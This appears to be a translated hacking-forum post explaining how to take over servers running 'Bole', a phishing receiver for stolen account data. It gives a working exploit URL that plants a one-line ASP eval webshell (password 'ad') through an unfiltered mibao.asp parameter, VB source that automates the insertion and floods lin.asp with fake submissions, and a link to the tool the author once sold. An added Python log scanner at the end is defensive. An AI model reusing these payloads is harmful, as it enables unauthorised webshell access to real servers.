http://forum.eviloctal.com/thread-32151-1-1.html
Some members have been PMing me about this. Besides, a lot of time has passed and it is no longer a secret; it is probably all over the Internet already. So I thought I would just post it. Treat it as study material.
Bole's receiving program (applies to older versions of the program.)
The main database name is randomly generated the first time the settings are used. But because it is a universal receiving program, it can also intercept "secret security" data.
The mibao.asp file does not filter the submitted parameters in any way:
    If action = "put" Then
        ' Request("u") is concatenated into the query without any filtering
        sql = "select * from mibao where u='" & Request("u") & "'"
        Set rs = Server.CreateObject("ADODB.RecordSet")
        rs.Open sql, conn, 1, 3
        If rs.EOF Then
            ' New record: the submitted values are stored exactly as received
            rs.AddNew
            rs("u") = Request("u")
            rs("pos") = Request("pos")
            rs("p") = "Wait for crack"
            rs.Update
            rs.Close
            Response.Write "Addok"
        Else
            sql = "update mibao set pos='" & Request("pos") & "'" & "where u='" & Request("u") & "'"
            conn.Execute(sql)
            Response.Write "Updateok"
        End If
    End If
The first line of the code is
    connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath("mibaoaa.asp")
so the submitted data is inserted into mibaoaa.asp, a database file with an .asp suffix. There is no anti-download processing. Submit a one-line Trojan and it is easy to get a webshell.
Let's say the box address is
http://127.0.0.1/
Visit
http://127.0.0.1/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22)%25>&mb=3&p=3
If it returns "Addok", the Trojan was inserted successfully.
Then visit
http://127.0.0.1/mibaoaa.asp
to reach the small Trojan. The password is ad. Upload the big Trojan and get a webshell.
Based on this vulnerability I wrote a simple program in VB that uses it.
VB source code of the program:
    Private Sub Command1_Click()
        Inet1.OpenURL (Text1.Text + "/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22)%25>&mb=3&p=3") ' Connect to the web page with Inet
        aa = InStr(Inet1.GetHeader, "404") ' Check whether the page header contains "404"; returns 0 if it does not, otherwise its position
        If aa <> 0 Then ' Header contains 404
            MsgBox "Trojan insert failed!", 48, "Failed!" ' The page does not exist
        Else ' Header does not contain 404
            MsgBox "Trojan insert succeeded!", 64, "Congratulations!" ' The page exists
            Command2.Enabled = True
        End If
    End Sub

    Private Sub Command2_Click()
        If Text2.Text = Text1.Text + "/mibaoaa.asp" Then
            MsgBox "Already exists! Please do not repeat this operation!", , "Error!"
        Else
            Text2.Text = Text1.Text + "/mibaoaa.asp"
            MsgBox "Please connect with a one-line Trojan client! Password: ad!", 64, "Succeeded!"
            Text2.Visible = True
        End If
    End Sub

    Private Sub Command3_Click()
        End
    End Sub
I have also packed and uploaded the program and an animated demo. The tutorial was made last year. Brothers, after watching, please do not try the information in it again.
Also do not add the contact QQ shown in the tutorial. Back then I sold a few copies of the program to make a living.
Now it is all public. BOLE.RAR (2.5 MB)
In addition, I saw some people in the thread mention the "brush letter" problem. lin.asp does not do much filtering either, so data can be submitted to it externally.
VB "brush letter" code:
    Private Sub Command1_Click()
        Inet1.OpenURL (Text1.Text + "/lin.asp?a=" + Text2.Text + "&s=" + Text3.Text + "&u=" + Text4.Text + "&p=" + Text5.Text + "&r=" + Text7.Text + "&l=" + Text8.Text + "&m=" + Text9.Text + "&pin=" + Text6.Text) ' Connect to the web page with Inet
        aa = InStr(Inet1.GetHeader, "404") ' Check whether the page header contains "404"; returns 0 if it does not, otherwise its position
        If aa <> 0 Then ' Header contains 404
            MsgBox "Brush letter failed! The default receiving page may have been renamed!", 48, "Failed!" ' The page does not exist
        Else ' Header does not contain 404
            MsgBox "Brush letter succeeded! Please log in to the background to view!", 64, "Congratulations!" ' The page exists
        End If
    End Sub

    Private Sub Command2_Click()
        End
    End Sub
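
Added example, not part of the original post: a web-log check for the request shape described above, where a server-side script opener is written into a stored parameter of a receiving page whose data file has a script extension. The log layout, sample lines and function names are constructed for illustration; values are URL-decoded (repeatedly) before matching because the opener arrives encoded, and the raw form is never matched so that `<%20` (an encoded space after `<`) does not trigger.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines (date time method uri-stem uri-query status), not real traffic.
# Line 1 has the request shape from the post; line 3 is the same idea double-encoded.
SAMPLE_LOG = """\
2009-03-01 10:00:01 GET /mibao.asp action=put&u=3&pos=3<%25eval+request(%22ad%22)%25>&mb=3&p=3 200
2009-03-01 10:00:02 GET /mibao.asp action=put&u=alice&pos=A1B2C3&mb=3&p=3 200
2009-03-01 10:00:05 GET /mibao.asp action=put&u=4&pos=%253C%2525execute+request(%2522x%2522)%2525%253E 200
2009-03-01 10:00:09 GET /search.asp q=a<%20b 200
"""

# Server-side script openers that turn stored data into code once the
# data file itself is served through the ASP engine.
SCRIPT_OPENER = re.compile(r"<%|<script[^>]*runat\s*=\s*[\"']?server", re.I)

def decoded_layers(raw, max_rounds=3):
    """URL-decode repeatedly; return every decoded form (never the raw one)."""
    layers, cur = [], raw
    for _ in range(max_rounds):
        nxt = unquote_plus(cur)
        layers.append(nxt)
        if nxt == cur:
            break
        cur = nxt
    return layers

def suspicious_params(query):
    """Names of query parameters whose decoded value contains a script opener."""
    hits = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if any(SCRIPT_OPENER.search(layer) for layer in decoded_layers(raw)):
            hits.append(name)
    return hits

def scan(log_text):
    """Return (line_no, uri_stem, flagged_params, status) for each suspicious request."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 6 or line.startswith("#"):
            continue
        stem, query, status = fields[3], fields[4], fields[5]
        params = suspicious_params(query)
        if params:
            findings.append((n, stem, params, status))
    return findings
```

A hit with status 200 on a page that writes to a data file is worth following up by checking whether that data file is itself reachable under a script extension.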